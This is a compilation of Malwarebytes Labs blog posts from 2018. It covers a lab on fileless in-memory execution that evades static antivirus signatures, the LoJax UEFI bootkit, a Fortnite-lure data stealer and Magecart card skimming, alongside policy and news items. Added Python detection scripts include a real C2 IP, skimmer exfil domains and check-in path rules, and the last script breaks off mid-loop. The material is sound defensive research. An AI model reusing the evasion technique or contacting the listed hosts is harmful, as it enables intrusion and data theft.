Some of these technologies are included in Malwarebytes’ consumer and business products, and are listed below:

The second downfall to static signatures is what I will be illustrating in this first lab. If there is no binary on disk to run a static signature against, then the static signature has nothing to detect against. So, in short, it fails. This is where the fileless attacks succeed.

In a perfect world, with unlimited computing power, we would theoretically be able to extract every bit of data from memory at all times and run static signatures against them to overcome this downfall. But because performance is always an issue, this is not possible, and static signatures will fail in this scenario. Having said that, I will proceed to the first lab.

Lab 1: Static-only bypass

First, I will run the test detection file manually on a system with Malwarebytes so that we can see the static signatures portion catching the file.

As you can see, the file was detected as Trojan.Vhioureas.POC. Again, this is because I created a test detection on a unique string I made using this simple program. If the program succeeds, it will pop up a calculator application.

Now I will load the same test file using the inception framework: a fileless execution framework.

As you can see, the vhioureasPOC file did not trigger any detection, and Calc popped up. The reason is because the inception framework streamed the malware source completely from a server and executed it purely within memory.

You can see this in the command parameter to UpdateService.exe, which is the inception client loader binary. It pulled the source code of the vhioureasPOC from the server I set up at the address in the URL. The fileless streaming method evaded the static signature engine of the AV.

Inception framework

Before continuing on to Lab 2, I will discuss the inception framework and how it can be used to load any .NET executable in memory. We will start with the server side.

The server side of inception has two main components: the payload generator and the actual malware server. The payload generator takes as an input, a C# source code file, and provides you with a custom URL token for fetching on the client’s side.

After we have generated the payload and started the malware server component, we can retrieve the source code in an encoded form via any HTTP request. For example, if we navigate to the generated URL in a browser on our client machine, we will see a long base64 string in the browser window. This is the payload.

Now moving onto the client side of inception. The client in and of itself is benign. It does not contain any malicious code. It’s simply a command-line tool that takes a URL as input. It fetches whatever is on the end of that URL and attempts to read it in as text, specifically looking for proper formatting of C# source code. It then takes the C# text and, using the operating system’s native compiler, performs run-time compiling purely in memory. It then executes the generated code.

This is how we were able to evade the static detection engine. There is never any point in which the malware code from the server exists on the hard drive. Because of that fact, there is no file for the static engine to scan.

As a side note, I would like to add that in general, no AV detects the source code of a compiled language. The reason is that source code can never run without being compiled, and thus can never cause harm on its own. This is an interesting point because even a network signature, such as a Snort rule or any other IDS signature, would be unlikely to pick this up. The malicious binary is never streamed; only the source code is. So it evades all static signatures, even on the network side.

Fighting this threat

Since we evaded the static engine, modern-day antivirus products, as I mentioned earlier, must contain technology to dynamically detect malicious activity on the system rather than simply match static signatures.

To test that this technology exists and works properly, we will be running inception once again against the victim machine, only this time with a payload that actually performs malicious actions on the victim. We should hope that the AV engine has the ability to determine that the execution on the system is malicious based on its activity. This is exactly what we will be testing in Lab 2.

Lab 2: fileless ransomware

For this lab, I will load the source code of a ransomware sample via inception. Essentially, nothing changes from the steps above; only now, the payload generation on the server side points to a ransomware source code file instead of the POC test.

As you can see, a detection was triggered this time. Although the static engine did not detect the malware, the application behavior portion of the engine stepped in and determined that there was malicious activity on the system that behaved like ransomware, and it triggered the detection. This is why you see it detected as Ransom.Agent.Generic.

Static vs. dynamic

I have created these demonstrations to show some of the problems that fileless malware can cause—mainly that they were able to easily bypass static engines. This doesn’t mean that I believe static signatures have no place in malware detection. I am simply showing their weakness when it comes to fileless attacks.

Static signatures help researchers properly classify malware families and provide more detailed detections. This is usually because, behind a signature, there is a malware analyst who has spent the time to research and understand the malware’s characteristics. I have seen many situations where a good signature has caught malware that a machine learning engine failed to identify. However, when the static detection fails, dynamic detection must take over. This symbiosis is key.

I am of the school of thought that both static and dynamic detection are necessary, and a good mix of both is still extremely valuable. Typically, when an anti-malware vendor uses signatures in addition to next-gen technology, that’s a sign that there are active malware analysts on the other side of the screen.

This gives me a peace of mind—that vendors are not leaving the fight against malware purely up to algorithms and technology. Technology is not quite advanced enough to be left fully in charge, and in the meantime, a mixture of humans and technology, malware analyst and machine, is still the best bet.

Stay tuned for part three of this series, where I will provide a detailed analysis of various fileless malware families.

The post Fileless malware: part deux appeared first on Malwarebytes Labs.

Categories: Techie Feeds

LoJack for computers used to attack European government bodies

Malwarebytes - Thu, 10/04/2018 - 15:00

Security researchers have detected the first known instance of a UEFI bootkit being used in targeted campaigns against government entities across Central and Eastern Europe. The attack focuses on UEFI-enabled computers and relies on a persistence mechanism lifted from a legitimate, but often questioned, piece of software called Computrace that comes by default on many computer systems.

This Computrace agent from Absolute Software is a service designed to recover lost or stolen computers, marketed under a name borrowed from the LoJack Stolen Vehicle Recovery System. In 2005, Absolute Software licensed the LoJack name for its computer-tracking product. After negotiations with manufacturers, the Computrace agent from Absolute Software, or LoJack for computers, now comes pre-loaded on a large number of machines.

The Computrace software uses a novel method to maintain persistence on computers. This method allows the code to survive a re-installation of the operating system or replacement of the hard drive. The software does this by integrating tightly into the low-level code stored in the SPI flash memory on the motherboard, where the system firmware (BIOS or UEFI) lives.

An ESET white paper details how a trojanized version of the Computrace agent gives attackers the ability to execute arbitrary code on vulnerable machines. This code can be stored within the SPI flash module, which keeps it out of reach of many security solutions. This code execution ability, along with the persistence and tracking capabilities of the Computrace software, makes for an extremely effective combination that is difficult to detect or remediate. ESET is calling this threat the LoJax malware.

As of this writing, use of this particular attack methodology appears to be limited in scope. Research indicates that the purpose of this novel attack vector has been to install the XAgent Remote Access Trojan, which others in the security industry have linked to the Russian hacking group that goes by many names including: APT28, Fancy Bear, and Sednit.

The successful execution of the malware payload is dependent upon a computer system that has been configured to disable the Secure Boot protections that come standard on newer Windows computers.

Secure Boot is a security feature of UEFI-enabled computers that requires a valid digital signature before the firmware will execute code stored within the SPI flash module. This is a current limitation of the LoJax malware: its UEFI module is not signed, so it will not run where Secure Boot is enabled, which is the default on most machines shipped with Windows 8 or later.

Users of operating systems that do not support Secure Boot, or who have to disable it in order to run unsigned software or drivers, lose that protection and will need to remain diligent.
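As an added check that is not part of the original post: on a Linux host, the firmware exposes the SecureBoot and SetupMode variables through efivarfs, each file carrying a four-byte attribute word followed by the value. The Python below is my example as editor. The GUID is the standard EFI global variable GUID, the file layout is that of efivarfs, and the sample byte strings are constructed; it classifies a machine as enabled, disabled, in setup mode (no platform key enrolled, so nothing is enforced) or without Secure Boot support at all, which is the state in which an unsigned UEFI module like the one described above would never be signature-checked.

```python
import struct
from pathlib import Path
from typing import Optional, Tuple

# EFI_GLOBAL_VARIABLE GUID: SecureBoot and SetupMode are published under it.
EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = Path("/sys/firmware/efi/efivars")  # efivarfs mount point on Linux


def parse_efivar(raw: bytes) -> Tuple[int, bytes]:
    """Split an efivarfs file into its little-endian attribute word and the payload."""
    if len(raw) < 4:
        raise ValueError("efivarfs file is shorter than the 4-byte attribute header")
    (attrs,) = struct.unpack("<I", raw[:4])
    return attrs, raw[4:]


def secure_boot_status(secureboot_raw: Optional[bytes],
                       setupmode_raw: Optional[bytes]) -> str:
    """Classify the platform from the raw contents of the two variables.

    None for SecureBoot means the variable is absent: legacy BIOS boot or a
    firmware without Secure Boot, so an unsigned UEFI module is never checked.
    """
    if secureboot_raw is None:
        return "unsupported"
    if setupmode_raw is not None:
        _, setup = parse_efivar(setupmode_raw)
        if setup[:1] == b"\x01":
            return "setup-mode"  # no Platform Key enrolled: nothing is enforced
    _, sb = parse_efivar(secureboot_raw)
    return "enabled" if sb[:1] == b"\x01" else "disabled"


def read_var(name: str) -> Optional[bytes]:
    """Read a variable from efivarfs, or None when it does not exist."""
    path = EFIVARS / f"{name}-{EFI_GLOBAL_VARIABLE}"
    return path.read_bytes() if path.exists() else None  # may need root to read


def check_live_system() -> str:
    """Classify the machine this script runs on (assumes Linux with efivarfs)."""
    return secure_boot_status(read_var("SecureBoot"), read_var("SetupMode"))


# Constructed sample variable contents: attribute word 0x06 (boot-service and
# runtime access, volatile), then the single value byte.
SAMPLE_ON = struct.pack("<I", 0x06) + b"\x01"
SAMPLE_OFF = struct.pack("<I", 0x06) + b"\x00"

if __name__ == "__main__":
    print("sample enabled :", secure_boot_status(SAMPLE_ON, SAMPLE_OFF))
    print("sample disabled:", secure_boot_status(SAMPLE_OFF, SAMPLE_OFF))
    print("this host      :", check_live_system())
```

On Windows the equivalent check is the PowerShell cmdlet Confirm-SecureBootUEFI from an elevated prompt. Either way, a result other than “enabled” is the condition under which the attack described above can proceed.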

Though currently limited in scope, we anticipate seeing this attack vector employed by other malware families and attackers in the future.

The post LoJack for computers used to attack European government bodies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bring your own security (BYOS): good idea or not?

Malwarebytes - Tue, 10/02/2018 - 15:00

We’ve talked about the concept of Bring Your Own Device, or BYOD, on the blog before. BYOD is a popular policy whereby employees can bring personally-owned devices, such as laptops, tablets, or smartphones, to work and use them to access data and applications. It helps to cut costs and can increase productivity, but it brings with it many security concerns and implications.

Similar in theory to BYOD is BYOS, or Bring Your Own Security. Under this policy, employees choose which security solution they would like to run on their devices. Is this a natural evolution of BYOD, or does it bring more concerns with it? Do those concerns matter if the device that will be connected to the company network has its own security software installed?

BYOS concerns

Differences in the security software that runs on corporate systems and BYOS devices can give your IT department a headache—especially if said devices have access to company resources like shared drives. Are there any conflicts between the software on the devices and the security solutions running in the corporate environment? It’s certainly possible.

There could be gaps between the devices’ security programs and corporate systems that attackers could take advantage of. In fact, adding security software to an existing setup does not always enhance security, especially if the two products are of the same type, such as two full antivirus suites or two free remediation tools. Even worse, you could end up weaker than you were before.

In addition, misconceptions may lead device owners into a false sense of security. For example, some may believe they are protected behind the company’s firewall as soon as they connect to the corporate Wi-Fi, or even as soon as they walk in the door. But is that true?

Let’s look at a few scenarios involving both BYOD and BYOS, their pros and their cons, and the security implications that each scenario brings with it.

The scenarios

To begin jumping into the following scenarios, let’s first set the stage by presenting four possible ways the BYOS policy might be implemented, whether devices are personally owned or issued by the organization. They include:

  • The employee owns the device and has his own security software installed.
  • The employee is issued a company device that she may also use for personal purposes. She gets to choose and install whichever security software she wishes.
  • The employee owns the device, but in order to be allowed to use it for company matters, she must install the company’s choice of security software.
  • The company issues a device that came with its choice of security software installed.

Before we talk these scenarios through one by one, let’s first establish one thing up front: An employee running security software that he did not choose, nor is familiar with, is probably a bad idea. Unless it is a cloud-based product that can be administered from a central location, the employee should get some training on how to optimally use the solution. There is no stronger security for workplaces than user awareness. In fact, we would—and do—advise this no matter what the scenario.

Scenario 1: All on the user

In the first scenario, in which the employee uses his own device and security software, you might say that it’s good for the company to stay out of the way and trust its users. However, when it comes to matters of security for proprietary data, it’s never a good idea to let it all blow in the wind.

It’s easy to say that it would be the employee’s problem if anything were to happen to the data on his device, but what good would that do the company? The information would already be out there, and the loss of data, endpoints, productivity, and reputation would cost much more than a single salary.

As for the employee: Would he even come forward about the leak if the company had no control over his device in the first place? Probably not. The company might be able to trace the infection back to his device, but after how long? How long did information-stealing malware sit and propagate in the network? What sort of secrets will it expose to those willing to pay top dollar on the black market?

This scenario would be the single worst BYOS idea if it weren’t for…

Scenario 2: A rare scenario

In this scenario, the organization issues a device to its employee but expects her to choose her own security program.

This is a rare scenario for good reason. Perhaps a company’s own IT department might have its employees test out different vendors. Perhaps a user only makes phone calls or types up documents on her device, and doesn’t need the Internet to do her job. However, in any other case you’d have to have one trusting organization and one extremely security-wise workforce.

Otherwise, employees might go for the cheapest option if they need to spend their own money—or use a free, limited version instead. Or, if billing the company, they may just grab the only name they know without investigating if it’s a good fit for the device or the user. The only other explanation is that the company cares so little about the security of their devices and networks, that they’re willing to throw away money on them.

Scenario 3: Mostly pro, a little con

This situation calls for the employee to select the device, but the company to prescribe the security setup.

Here, the employee gets to either purchase or be reimbursed for the device she likes with the caveat that she must install security software that meets corporate guidelines. This is mostly a win-win scenario, as the employee gets to use the device she prefers, but the company can be reassured that the device is secure and safe to use in the corporate environment. In an ideal situation, the device can even be monitored by the corporate SIEM or cloud console.

One note on this scenario: While it’s an ideal setup for supplementary devices or remote employees, it might not make the most sense for users’ primary machines. This is because managing a fleet of different devices with different operating systems could get tedious for IT teams, even with the same security protocols followed.

Scenario 4: The company’s choice

The fourth scenario, where the company decides on the device and the security software, is the easiest solution for organizations, but decidedly neither BYOD nor BYOS. This sounds more like what an HQ worker might expect to receive from the IT department on the first day of employment.

While easiest to control, it’s also costly—whether the company is providing a single laptop or a supplementary smart phone. In this case, businesses should be prepared to defend against threats encountered by employees doing legitimate work or occasionally using the device for personal reasons, such as online shopping or social media. Companies should essentially treat this more or less the same as when an employee occasionally takes a company laptop home to do some work.

Installing security software on a corporate machine

A completely different scenario is one in which no outside device plays a role. Instead, employees bring their own security into the workplace environment. This does sometimes happen—people install their preferred security software on their work computers of their own initiative. For example, our telemetry tells us that our free consumer remediation product is downloaded and run on many corporate machines, used to clean malware that has slipped through the cracks of their workplace’s official security setup.

What we can’t see in our telemetry is whether this is done by users themselves or by someone from the IT team as an impromptu method to deal with an infection. Although using a free consumer product in a business environment is technically against its license terms, it doesn’t pose a direct security risk. It does pose a question for the company’s IT department, however, who would probably like to know which threat managed to wriggle through their net and how.

Regardless, there’s a difference between employees installing free remediation tools for clean-up purposes only and those who install paid-for, active protection on top of the corporate security stack. In the latter case, the additional real-time endpoint protection conflicts with the security software that already controls the corporate environment. Like two dogs fighting over a bone, nobody wins, and the bone (the malware) gets away.

Important considerations

The safest, most efficient way to implement workplace security for both the company and its employees is to come up with a corporate policy. When trying to decide on a BYOD security policy, there are a few points that should at least be considered. They include:

  • Which operating systems will you allow? Not every product supports every OS, and if you want uniformity or central management, this is an important issue.
  • Which software will you allow? And if you are going to use restrictions, will you be using a blacklist or a whitelist?
  • How detailed do you want your security policy to be? Are you going to give your employees a general outline or are you really going to drill down into details like minimum requirements for passwords or how to identify phishing emails?
  • Do you want to be able to monitor devices that fall under the BYOD setup from your central management console? And does that require the devices to meet certain specifications?
  • What happens to the devices when the employee leaves the company? Or better yet, what happens to the information, software, and other company-related data on the device?

Best practices

The list of best practices for turning any Bring Your Own Security setup into a successful and secure endeavour looks a lot like the list for any security guidelines, but we want to repeat the advice anyway:

  • Train your staff on basic computer hygiene, such as avoiding tech support scams, steering clear of links to unknown sources, and never opening attachments from suspicious emails. In addition, make sure they’re aware of what to do and what not to do in the event of a breach.
  • Create a fair policy that has been clearly communicated so that employees understand what is acceptable and what the consequences might be if they don’t comply.
  • Encrypt file storage and communications to lessen the chances of vital information or data falling into the wrong hands.
  • Ensure timely software updates for all. What’s the use of a system admin rushing to check, verify, and install updates when there are devices roaming around that are several patches behind?
  • Use a VPN for off-site communications to rule out eavesdropping and man-in-the-middle attacks.

There are pros and cons to most BYOS and BYOD scenarios. However, if a company’s IT team and workforce are prepared, many of these situations have a good chance of working out in the best interest of all involved.

Awareness of the possible implications is always a good starting point. Vigilance is security’s better half.

The post Bring your own security (BYOS): good idea or not? appeared first on Malwarebytes Labs.

Fortnite gamers targeted by data theft malware

Malwarebytes - Tue, 10/02/2018 - 14:00

The new season of the incredibly popular video game Fortnite is upon us, and so too are the scams. It’s no surprise that con artists would jump on this bandwagon, eager to peddle their fakeouts.

Only this time, scammers had something a little more dangerous in mind than the usual low-level surveys and downloads that never materialize. Hidden among the glut of scams was a malicious file ready to steal data and enumerate Bitcoin wallets, for starters.

How did we find it? First, we sifted through a sizable mish-mash of free season six passes, supposedly “free” Android versions of Fortnite, which were leaked out from under the developer’s noses, the ever-popular blast of “free V-Bucks” used to purchase additional content in the game, and a lot of bogus cheats, wallhacks, and aimbots.

YouTube, for example, was awash with them at the time of writing.

These videos can drive huge numbers: one that has since been pulled down managed to rack up 120,000 views before the hammer fell.

Almost all of the scam tomfoolery followed the typical survey route, as expected. But buried in all of this was a nasty little slice of data theft malware disguised as a cheat tool.

Offering up a malicious file under the pretense of a cheat is as old school as it gets, but that’s never stopped cybercriminals before. In this scenario, would-be cheaters suffer a taste of their own medicine via a daisy chain of clickthroughs and (eventually) some malware as a parting gift. Shall we take a look?

Setting the scene

The YouTube account offering this scam up has a little over 700 subscribers, and the video in question already had more than 2,200 views the day after being uploaded.

Clicking the link sends potential victims to a page on Sub2Unlock. This site differs from typical survey pages, where you’d normally click offers or fill in questions to obtain a theoretical reward. Instead, it asks you to hit subscribe on the social portal of the person sending you there in the first place. So there’s one difference, right off the bat.

Another difference is that a typical survey page requires you to actually complete a survey before progressing. Without doing so, you can’t get to a download link.

Here, we had no validation taking place during our testing. Clicking the subscribe button simply opened up the YouTube channel’s subscribe page but nothing checked to ensure we’d actually subscribed. All we had to do at this point was go back to the Sub2Unlock site and click the download button.

From here, gamers are whisked away to a site located at


This site is a fairly good-looking portal claiming to offer up the desired cheat tools, and it stands a fair chance of convincing youngsters of its legitimacy. A little bit more button clicking, and potential victims are taken to a more general download site containing what appears to be an awful lot of files alongside a wide range of adverts.

As far as the malicious file in question goes, at time of writing, 1,207 downloads had taken place. That’s 1,207 downloads too many.

File information

Malwarebytes detects this file as Trojan.Malpack, a generic detection given to files packed suspiciously. The actual payload could be anything at all, but it will invariably be up to no good. In this case, a little digging showed us the payload is a data stealer.

Once the initial .EXE (which weighs in at just 168KB) runs on the target system, it performs some basic enumeration of details specific to the infected computer. It then attempts to send that data in an HTTP POST request to an /index.php endpoint on a server in the Russian Federation at the IP address 5(dot)101(dot)78(dot)169.

Some of the most notable things it takes an interest in are browser session information, cookies, Bitcoin wallets, and also Steam sessions.

Bizarrely, it also wrote this to our test system:

…Grateful Dead, anyone?

The IP address up above has been seen many times in relation to similarly named/themed files.

Many of the files contained in this download are packed in entirely different ways. One of them runs as a process called “Stealer.exe.” Several post the stolen information to /gate.php instead of /index.php, a check-in path that is a common sign of Zbot and a few other families.

While this particular file probably isn’t that new, it will still do a fair bit of damage to anyone who runs it. Combining it with the current fever for new Fortnite content is a recipe for stolen data and a lot of cleanup afterward.
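To turn the indicators above into something a network defender can actually run, here is an added Python example (mine, not code from the Malwarebytes post). It scans proxy log lines for the check-in pattern described: a POST to the IP named in the post, or a POST to /index.php or /gate.php on a bare-IP host with a non-browser user agent. The log format, the internal client addresses, the second server IP and the benign lines are constructed for illustration; only 5.101.78.169 and the two paths come from the post.

```python
"""Scan proxy logs for stealer check-ins matching the indicators above."""
import re
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlsplit

KNOWN_C2_IPS = {"5.101.78.169"}             # IP from the post (written defanged there)
PANEL_PATHS = {"/index.php", "/gate.php"}   # check-in paths named in the post

# Constructed log format: "<epoch> <client> <method> <url> <status> \"<user-agent>\""
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Constructed sample traffic: two infected hosts plus two benign lines.
SAMPLE_LOG = """\
1538481600.123 10.0.0.12 POST http://5.101.78.169/index.php 200 "Mozilla/4.0"
1538481601.456 10.0.0.12 GET http://www.example.com/index.php 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/69"
1538481602.789 10.0.0.33 POST http://203.0.113.7/gate.php 200 "-"
1538481603.000 10.0.0.33 POST https://shop.example.com/checkout 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/69"
"""


@dataclass
class Entry:
    ts: str
    client: str
    method: str
    url: str
    status: int
    ua: str


def parse_line(line: str):
    """Return an Entry for a well-formed line, or None so junk never raises."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return Entry(d["ts"], d["client"], d["method"], d["url"], int(d["status"]), d["ua"])


def is_bare_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify(entry: Entry) -> list:
    """Reasons this request looks like a stealer check-in (empty list = benign)."""
    reasons = []
    parts = urlsplit(entry.url)
    host = parts.hostname or ""
    path = parts.path or "/"
    if host in KNOWN_C2_IPS:
        reasons.append("known-c2-ip")
    if entry.method == "POST" and path in PANEL_PATHS:
        # Real sites sit behind names; stealer panels are usually reached by raw IP.
        if is_bare_ip(host):
            reasons.append("post-to-bare-ip-panel-path")
        # Heuristic: an empty UA or the bare WinInet-style "Mozilla/4.0" is not a browser.
        if entry.ua in ("", "-") or entry.ua.startswith("Mozilla/4.0"):
            reasons.append("non-browser-user-agent")
    return reasons


def scan(log_text: str) -> list:
    """Return (client, url, reasons) for every line that trips at least one rule."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            alerts.append((entry.client, entry.url, reasons))
    return alerts


if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(f"{client} -> {url}: {', '.join(reasons)}")
```

The bare-IP and user-agent rules are heuristics and will need tuning against your own baseline; the known-IP match is the only rule that is an indicator on its own.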

As a final note, we should mention the readme file accompanying the stealer advertises being able to purchase additional Fortnite cheats for “$80 Bitcoin.”

Given how things up above panned out, we’d advise anyone tempted to cheat to steer well clear of this one. Winning is great, but it’s absolutely not worth risking a huge slice of personal information to get the job done.

A week in security (September 24 – 30)

Malwarebytes - Mon, 10/01/2018 - 16:44

Last week on Labs was a busy one. We discussed how SMS phishing attacks target the job market, issued a warning about TV Licensing phishes, commented on how Apple confused Safari users with recent changes to the way macOS handles browser extensions, and elaborated on holes found in Mojave’s privacy protection (deep breath!). We also showed how a buggy implementation of the CVE-2018-8373 exploit is used to deliver Quasar RAT, discussed what is needed to fight back in the age of unwanted calls, gave some tips on how to protect your data from Magecart and other e-commerce attacks, and alerted our readers that millions of accounts were affected in the latest Facebook vulnerability.

Other cybersecurity news:
  • Tech firms back US privacy law to negate states. (Source: The Washington Post)
  • Microsoft rolls out confidential computing for Azure. (Source: Bleeping Computer)
  • Google recently made a change to simplify the way Chrome handles sign-in. (Source: The Keyword)
  • VirusTotal announces VirusTotal Enterprise. (Source:
  • 14 years imprisonment for man who helped hackers evade detection by antivirus software. (Source: Hot for Security)
  • Port of San Diego’s information technology systems disrupted by ransomware. (Source: Port of San Diego)
  • LoJax: the first UEFI rootkit found in the wild, courtesy of the Sednit group. (Source: WeLiveSecurity)
  • Telegram leaks public/private IP addresses of end users in desktop. (Source: inputzero)
  • iPhone XS passcode bypass hack exposes contacts and photos. (Source: ThreatPost)
  • Secret Service warns of surge in ATM ‘wiretapping’ attacks. (Source: Krebs on Security)
  • Mutagen Astronomy: Linux kernel ‘give me root, now’ security hole sighted. (Source: TheRegister)

Stay safe, everyone!

Malwarebytes is a champion of National Cyber Security Awareness Month

Malwarebytes - Mon, 10/01/2018 - 14:00

October is here. For most of us in the US cybersecurity industry, it’s the month when we commemorate National Cybersecurity Awareness Month (NCSAM). For those who are unfamiliar with this campaign, NCSAM generally aims at driving awareness for safe Internet use, whether you’re a regular consumer or top security executive. Protecting the Internet and keeping it safe is our shared responsibility.

And that’s why we at Malwarebytes not only pledge to provide the best protection for our home and business customers. We also commit ourselves to fostering cybersecurity education and awareness for all. Labs security researchers and writers are on the front lines every day, scouring the Internet for threats and reporting them, as well as how you can stay safe against them, here on the blog. We hope you continue to feel safe knowing we will always do our best to stop attacks, stomp out dangerous malware, and swat away annoying scammers.

Now in its 15th year, NCSAM will address current cybersecurity challenges by focusing on securing families and their homes, building a robust, cyber-aware workforce, and securing critical infrastructure. The themes assigned to each week of the month are aligned with these objectives.

Below are the themes per week, a brief overview of each, and helpful links we recommend you, dear reader, start perusing.

Week 1: October 1–5

Theme: “Make Your Home a Haven for Online Safety”

NCSAM kicks off its campaign by going back to basics. Parents and caregivers, it’s time to brush up on your cybersecurity know-how and get your kids and the entire family involved. Check out these helpful Malwarebytes Labs posts if you need some inspiration:

Week 2: October 8–12

Theme: “Millions of Rewarding Jobs: Educating for a Career in Cybersecurity”

As that song goes, “I believe the children are our future.” And we believe that they can make a difference—for better or for worse—on the state of cybersecurity and the future of the Internet as we know it. Schools and teachers play a significant role in shaping the way our kids view and respond to the world, both in their real and digital lives. By molding young minds to be good citizens of the Internet and encouraging careers that honor that code, you can help clear the way for a better online experience for generations to come. Here are some references you may want to read up on:

Week 3: October 15–19

Theme: “It’s Everyone’s Job to Ensure Online Safety at Work”

The shortage of cybersecurity professionals is a genuine problem, especially for businesses that rely on a tight-running and secure ship to keep profit flowing and customers happy. A way to address this shortage is to change the tide by educating current personnel about the importance of taking cybersecurity seriously and how to respond in the event of a cyberattack. Small, medium, and enterprise-sized businesses can pilfer useful nuggets of wisdom from these blog posts:

Week 4: October 22–26

Theme: “Safeguarding the Nation’s Critical Infrastructure”

The uncovering of Stuxnet nearly a decade ago completely changed the way we see our critical infrastructures. Since then, there has been an active call to secure the 16 sectors that literally keep a nation running—and for a good reason. Lives are at stake.

While protecting our critical infrastructure may seem like a specialized topic dedicated to a particular audience, it’s not. Those working in the financial, health, and communications sectors, as well as in energy, electricity, and other utilities can contribute by taking on the seemingly impossible task of securing their organizations.

Note that good security hygiene is a start, but efforts shouldn’t stop there. We’ll explore this topic in depth come November, when we’ll be looking at election security and commemorating Critical Infrastructure and Resilience Month. For now, you can read through these posts for helpful insights:

If you or your organization want to take part in NCSAM, it’s never too late to register. You can visit the StaySafeOnline website and navigate to the Become a Champion menu link. After registering, you or your organization will be listed in the 2018 Champions page and receive helpful resources to educate yourself and spread awareness to others.

As always: Stay safe, everyone!

See also:

Millions of accounts affected in latest Facebook hack

Malwarebytes - Fri, 09/28/2018 - 19:39

Facebook announced earlier today that its social network had been hacked, with almost 50 million accounts directly impacted and another 40 million considered potentially affected as a precaution.

Attackers exploited a feature in Facebook called “View As,” which essentially shows how your profile looks to others. The flaw enabled them to get ahold of so-called Access Tokens, which allowed them to be logged in as genuine Facebook users without having to use their password.

The feature has for now been turned off and the underlying vulnerability fixed. A law enforcement investigation is ongoing to determine the full scope of the hack and identify the perpetrators.

Facebook says it has taken action and that there is no need for users to reset their passwords, although it is a good opportunity to remind users that passwords should be complex and not reused across multiple services.

We recommend people follow the Facebook hack story to get a better idea of what exactly was accessed and take the necessary precautions. We will keep Labs readers informed of further developments.

How to protect your data from Magecart and other e-commerce attacks

Malwarebytes - Fri, 09/28/2018 - 15:00

In today’s golden age of online shopping, consumers take to the Internet, punch in a few credit card details, and happily receive products at their doorstep, safe in the knowledge that their online vendor is well-known, vetted, and therefore their website has to be secure, right? But did you know that attackers can steal your credit card details with only a few lines of JavaScript?

Attacks on websites with the purpose of collecting user submitted data are hardly new. Magento, the open-source e-commerce platform, has been the target of such hacks for years.

By compromising websites that are also used as payment platforms, harvesting credit card numbers and other private, personally identifiable information (PII) on-the-fly is a surprisingly easy and lucrative process.

In a sense, this is the digital equivalent of credit card skimming, where someone’s card details are grabbed by a tampered ATM or payment terminal. In the same way that criminals tamper with the ATM, they can tamper with a website’s checkout page.

In recent months, there has been a steady increase of such attacks going after smaller websites and major companies alike. This blog post will review some of the most recent events we’ve witnessed, and offer some mitigation techniques for a threat that intends to fly under the radar.

Third-party compromises

Attackers can compromise a website using many different techniques, often by exploiting vulnerabilities or weak passwords. When that is not possible, they often target a third-party library that the site relies on, which perhaps is not as secure.

An added benefit of third-party compromises is the scalability of the attack. By hacking into one provider, you can affect an entire group of websites that depend on it.

The malicious code below was appended to a legitimate and trusted script in an obfuscated format. This is the work of Magecart, the name given to a group of threat actors responsible for several high profile attacks recently.

After decoding the script, we can see the code responsible for harvesting the data when customers hit the checkout button. At the network level, this looks like a POST request where each field (name, address, credit card number, expiry date, CVV, etc.) is sent in Base64 format to the rogue server (info-stat[.]ws) controlled by the criminals:
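Here is an added example (mine, not code from the post) of what a responder can do with a capture of a request of this shape: parse it, base64-decode each form field, confirm with a Luhn check which field actually carries a card number, and match the Host header against the exfil domain named above. The request body, the field names and the card number (a standard test number) are constructed; only the info-stat[.]ws domain comes from the post, and it is refanged in code purely so the Host header can be compared.

```python
"""Decode a captured skimmer POST and pick out the card data it carries."""
import base64
import binascii
from urllib.parse import parse_qsl

# Exfil domain from the post, defanged there as info-stat[.]ws; refanged only for matching.
EXFIL_HOST = "info-stat[.]ws".replace("[.]", ".")
BLOCKED_HOSTS = {EXFIL_HOST}

# Constructed capture of the request shape described above: a urlencoded body in
# which every form field's value is base64-encoded. Test data, not a real victim.
CAPTURED_REQUEST = (
    "POST /gate/ HTTP/1.1\r\n"
    f"Host: {EXFIL_HOST}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "name=Sm9obiBEb2U%3D&cc=NDExMTExMTExMTExMTExMQ%3D%3D&exp=MTIvMjM%3D&cvv=MTIz"
)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_field(value: str) -> str:
    """Base64-decode one field; fall back to the raw value if it was not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value


def decode_exfil_body(body: str) -> dict:
    return {k: decode_field(v) for k, v in parse_qsl(body, keep_blank_values=True)}


def luhn_ok(number: str) -> bool:
    """True for an all-digit string of plausible PAN length that passes Luhn."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) != len(number) or not 13 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:           # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_fields(decoded: dict) -> list:
    """Names of the decoded fields whose value looks like a card number."""
    return [k for k, v in decoded.items() if luhn_ok(v.replace(" ", ""))]


def triage(raw: str) -> dict:
    """Everything an analyst wants from one captured request, in one call."""
    method, path, headers, body = parse_request(raw)
    decoded = decode_exfil_body(body)
    return {
        "method": method,
        "path": path,
        "to_blocked_host": headers.get("host", "") in BLOCKED_HOSTS,
        "fields": decoded,
        "card_fields": card_fields(decoded),
    }


if __name__ == "__main__":
    for key, value in triage(CAPTURED_REQUEST).items():
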